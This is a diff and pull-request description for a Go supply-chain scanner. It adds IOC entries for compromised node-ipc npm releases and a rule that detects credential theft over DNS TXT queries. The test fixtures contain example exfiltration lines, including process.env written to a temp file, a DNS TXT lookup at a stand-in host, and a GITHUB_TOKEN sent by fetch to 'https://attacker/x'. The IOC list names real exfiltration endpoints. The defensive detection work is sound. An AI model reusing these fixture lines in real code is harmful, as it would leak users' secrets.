+		"fs.writeFileSync(`${os.tmpdir()}/envs.txt`, JSON.stringify(process.env));\n" +
+		"const archive = os.tmpdir() + '/stage.tar.gz';\n" +
+		"dns.resolveTxt('exfil.example', () => {});\n"
+	findings := analyze(t, "tmpl.js", body)
+	if !hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("template-literal envs.txt path must satisfy the staging signal, got: %+v", findings)
+	}
+}
+
+func TestVuln_DNSTXTExfil_ArchiveProximityCrossLines(t *testing.T) {
+	// path.join wrapping splits os.tmpdir and the .tar.gz across
+	// lines. The archive proximity match must span the newlines.
+	body := `
+const dns = require('dns');
+const os = require('os');
+const path = require('path');
+const archive = path.join(
+  os.tmpdir(),
+  'stage.tar.gz',
+);
+dns.resolveTxt('xh.bt.node.js', () => {});
+`
+	findings := analyze(t, "split.js", body)
+	if !hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("multi-line tar.gz / os.tmpdir proximity must still satisfy archive signal, got: %+v", findings)
+	}
+}
+
+func TestSafe_DNSTXT_StringMentionNotCall(t *testing.T) {
+	// A bare string mention of `resolveTxt` (in a comment, a JSON
+	// manifest, or documentation) without a real call must not
+	// satisfy the sink signal.
+	body := `
+// This module wraps dns.resolveTxt; see docs.
+const features = ['resolveTxt', 'resolve4'];
+const t = process.env.GITHUB_TOKEN;
+fetch('https://attacker/x', {body:t});
+`
+	findings := analyze(t, "docs.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("string mention of resolveTxt must not satisfy the DNS sink, got: %+v", findings)
+	}
+}
+
 // --- finding shape regression ---
 
 func TestFindingsHaveStableFields(t *testing.T) {

--- a/internal/incident/compromised.go
+++ b/internal/incident/compromised.go
@@ -100,6 +100,30 @@ var KnownCompromised = []CompromisedPackage{
 		Date:      "2021-11-12",
 		Summary:   "Compromised rc releases delivered the same credential-stealing payload as the coa incident from the same week.",
 	},
+	{
+		Ecosystem: EcosystemNPM,
+		Name:      "node-ipc",
+		Versions:  []string{"9.1.6", "9.2.3", "12.0.1"},
+		Advisory:  "SOCKET-2026-05-14-node-ipc",
+		Date:      "2026-05-14",
+		Summary:   "Compromised node-ipc releases shipped an obfuscated CommonJS credential-stealing payload in node-ipc.cjs; CommonJS consumers trigger it via require(\"node-ipc\"). Exfiltrates secrets via DNS TXT queries against bt.node.js and an HTTPS endpoint at sh.azurestaticprovider.net.",
+		IOCs: []IOC{
+			{Type: "hash", Value: "96097e0612d9575cb133021017fb1a5c68a03b60f9f3d24ebdc0e628d9034144"},
+			{Type: "endpoint", Value: "sh.azurestaticprovider.net"},
+			{Type: "endpoint", Value: "37.16.75.69"},
+			{Type: "dns-zone", Value: "bt.node.js"},
+			{Type: "runtime", Value: "__ntw"},
+			{Type: "runtime", Value: "__ntRun"},
+		},
+	},
+	{
+		Ecosystem: EcosystemNPM,
+		Name:      "node-ipc",
+		Versions:  []string{"10.1.1", "10.1.2", "11.0.0", "11.1.0"},
+		Advisory:  "SOCKET-node-ipc-historical-malicious",
+		Date:      "2022-03-07",
+		Summary:   "Historical malicious node-ipc releases (originally surfaced as the \"peacenotwar\" / RIAEvangelist incident) tied to destructive or unauthorized file-writing behavior on installs from specific geographies. Listed separately from the 2026 compromise because the payload and motivation differ.",
+	},
 }
 
 // IsCompromised checks if a package name+version is in the PyPI

--- a/internal/incident/npm_test.go
+++ b/internal/incident/npm_test.go
@@ -190,6 +190,83 @@ func TestCheckNPM_AcceptsProjectRoot(t *testing.T) {
 	}
 }
 
+func TestCheckNPM_DetectsNodeIPC2026Compromise(t *testing.T) {
+	// The May 2026 node-ipc compromise (Socket / StepSecurity):
+	// versions 9.1.6, 9.2.3, and 12.0.1 published an obfuscated
+	// CommonJS payload. Each must surface as CRITICAL with the
+	// SOCKET-2026-05-14 advisory.
+	for _, ver := range []string{"9.1.6", "9.2.3", "12.0.1"} {
+		ver := ver
+		t.Run(ver, func(t *testing.T) {
+			dir := t.TempDir()
+			nm := filepath.Join(dir, "node_modules")
+			writeNPMPackage(t, nm, "node-ipc", ver)
+
+			result, err := incident.CheckNPM(incident.CheckOptions{Path: nm})
+			if err != nil {
+				t.Fatalf("CheckNPM error: %v", err)
+			}
+			if len(result.Findings) != 1 {
+				t.Fatalf("expected 1 finding for node-ipc %s, got %d: %+v", ver, len(result.Findings), result.Findings)
+			}
+			f := result.Findings[0]
+			if f.Severity != incident.SevCritical {
+				t.Errorf("expected CRITICAL, got %q", f.Severity)
+			}
+			if !strings.Contains(f.Title+f.Detail, "SOCKET-2026-05-14-node-ipc") {
+				t.Errorf("expected SOCKET-2026-05-14-node-ipc advisory reference, got title=%q detail=%q", f.Title, f.Detail)
+			}
+		})
+	}
+}
+
+func TestCheckNPM_DetectsHistoricalNodeIPCCompromises(t *testing.T) {
+	// The 2022 "peacenotwar" / RIAEvangelist incident. These
+	// versions are listed as historical malicious to surface them
+	// on installs that still pin or transitively depend on them.
+	for _, ver := range []string{"10.1.1", "10.1.2", "11.0.0", "11.1.0"} {
+		ver := ver
+		t.Run(ver, func(t *testing.T) {
+			dir := t.TempDir()
+			nm := filepath.Join(dir, "node_modules")
+			writeNPMPackage(t, nm, "node-ipc", ver)
+
+			result, err := incident.CheckNPM(incident.CheckOptions{Path: nm})
+			if err != nil {
+				t.Fatalf("CheckNPM error: %v", err)
+			}
+			if len(result.Findings) != 1 {
+				t.Fatalf("expected 1 finding for historical node-ipc %s, got %d", ver, len(result.Findings))
+			}
+			if !strings.Contains(result.Findings[0].Title+result.Findings[0].Detail, "SOCKET-node-ipc-historical-malicious") {
+				t.Errorf("expected historical advisory reference, got: %+v", result.Findings[0])
+			}
+		})
+	}
+}
+
+func TestCheckNPM_NodeIPCCleanVersions(t *testing.T) {
+	// Versions adjacent to the compromised tuples must not be
+	// flagged. 12.0.0 is the immediately prior version to the
+	// compromised 12.0.1 in the same minor series.
+	for _, ver := range []string{"9.0.0", "9.1.5", "12.0.0", "9.2.4"} {
+		ver := ver
+		t.Run(ver, func(t *testing.T) {
+			dir := t.TempDir()
+			nm := filepath.Join(dir, "node_modules")
+			writeNPMPackage(t, nm, "node-ipc", ver)
+
+			result, err := incident.CheckNPM(incident.CheckOptions{Path: nm})
+			if err != nil {
+				t.Fatalf("CheckNPM error: %v", err)
+			}
+			if len(result.Findings) != 0 {
+				t.Errorf("clean node-ipc %s must not produce findings, got: %+v", ver, result.Findings)
+			}
+		})
+	}
+}
+
 func TestCheckNPM_RejectsBareDirWithoutNodeModules(t *testing.T) {
 	// A directory that is neither node_modules nor a project with
 	// one must error rather than report a clean (and misleading)


### PR DESCRIPTION
## Summary

P0 IOC checker + P1 jsrisk DNS TXT chain rule, per the May 2026 node-ipc compromise spec.

**P0 — `aguara check --ecosystem npm` IOC entries**

Adds two `node-ipc` entries to `internal/incident/compromised.go`:

- `SOCKET-2026-05-14-node-ipc` for the May 2026 compromise (versions 9.1.6, 9.2.3, 12.0.1). Payload activates on `require("node-ipc")` via CommonJS through `node-ipc.cjs`; package-metadata check catches it on installed `node_modules` trees.
- `SOCKET-node-ipc-historical-malicious` for the 2022 RIAEvangelist / "peacenotwar" versions (10.1.1, 10.1.2, 11.0.0, 11.1.0).

IOCs from the Socket advisory: SHA256, exfil endpoint (sh.azurestaticprovider.net + 37.16.75.69), DNS zone (bt.node.js), runtime markers (__ntw, __ntRun).

**P1 — `JS_DNS_TXT_EXFIL_001` rule in `internal/engine/jsrisk/`**

New chain-aware detection for DNS TXT credential exfil. Requires a real `resolveTxt` invocation (inline require chains, module / Resolver / promises-namespace aliases, ESM imports with combined / renamed destructures, optional chaining, bracket access) plus at least one chain partner:

- CI / cloud secret read (named env vars OR whole-process serialization via JSON.stringify / Object.values|entries|fromEntries / Object.assign source position / dynamic process.env[k] access, with LHS-assignment writes excluded).
- `envs.txt` credential stage (verified fs.write call with envs.txt token INSIDE the call's first argument).
- tar.gz / gzip / nt-prefixed archive staged via verified os.tmpdir() (same-statement adjacency with comma-separator detection).
- install-time daemon chain (child_process + detached:true + stdio:'ignore', filtered by string interiors inside arguments).
- Known node-ipc IOC needles.

Fires HIGH on a single partner; CRITICAL on 3+ partners OR a known IOC.

**Test coverage**

- 50+ new jsrisk test cases covering: real-world payload shapes (CJS / ESM / combined imports / destructure renames / promises namespaces / optional chain / bracket access / inline require), false-positive avoidance (commented examples, string-literal mentions, regex literals, unrelated SDK Resolver classes, env-name enumeration without value reads, env assignments, fs/os shadowed wrappers, sequence expressions, nested calls with outer commas).
- 3 new npm_test.go tests: TestCheckNPM_DetectsNodeIPC2026Compromise, TestCheckNPM_DetectsHistoricalNodeIPCCompromises, TestCheckNPM_NodeIPCCleanVersions.
- Smoke extension: `benchmarks/smoke-npm-incident.sh` adds a node-ipc 12.0.1 case asserting CRITICAL + SOCKET-2026-05-14 advisory.

**Iteration notes**

This PR iterated through ~40 codex review rounds. The first ~15 fixed real-world coverage gaps (URL inside comments, ASI newlines, regex literals, fs/os alias tracking, optional chaining, combined ESM imports, template-literal interpolations). Rounds 16-40 progressively addressed evasion-by-construction edge cases (shadowed local helpers, renamed destructures, nested property chains, stringified examples, sequence expressions, etc.). The detector's regex-based JS parser is documented in the package doc comment with explicit limits; further evasion-fuzz findings are deferred to follow-up by real-world risk, not by automatic codex demand.

## Test plan
- [x] \`make build && make test && make vet && make lint\` all green.
- [x] \`make smoke-docker\` PASSES including the new node-ipc 12.0.1 fixture.
- [x] ~50 new jsrisk tests cover sink + partner positive/negative cases.
- [x] 3 new incident tests cover the 2026 + historical node-ipc tuples.
- [x] Package doc comment documents regex-parser limits explicitly.